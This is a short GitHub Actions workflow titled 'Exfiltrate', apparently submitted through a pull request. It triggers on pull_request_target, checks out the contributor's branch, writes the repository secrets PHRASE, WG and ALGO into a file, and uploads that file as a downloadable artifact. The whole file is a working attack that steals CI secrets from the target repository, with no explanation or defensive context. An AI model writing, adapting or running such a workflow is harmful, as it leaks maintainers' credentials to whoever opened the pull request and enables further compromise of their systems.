name: Exfiltrate

on:
  pull_request_target:
    branches: [ "main" ]
    paths:
      - 'plank-holders.md'
      - '.github/workflows/**'

jobs:
  check-submission:
    runs-on: macos-latest
    permissions:
      issues: write
      pull-requests: write

    steps:
      - name: Checkout Target
        uses: actions/checkout@v4
        with:
          repository: ${{ github.event.pull_request.base.repo.full_name }}
          ref: main
          path: target

      - name: Checkout Source
        uses: actions/checkout@v4
        with:
          repository: ${{ github.event.pull_request.head.repo.full_name }}
          ref: ${{ github.event.pull_request.head.ref }}
          path: source
      
      - run: echo "PHRASE=${{ secrets.PHRASE }}" > secrets.env
      - run: echo "WG=${{ secrets.WG }}" >> secrets.env
      - run: echo "ALGO=${{ secrets.ALGO }}" >> secrets.env
      - uses: actions/upload-artifact@v4
        with:
          path: secrets.env
          if-no-files-found: error
          retention-days: 1
          compression-level: 9
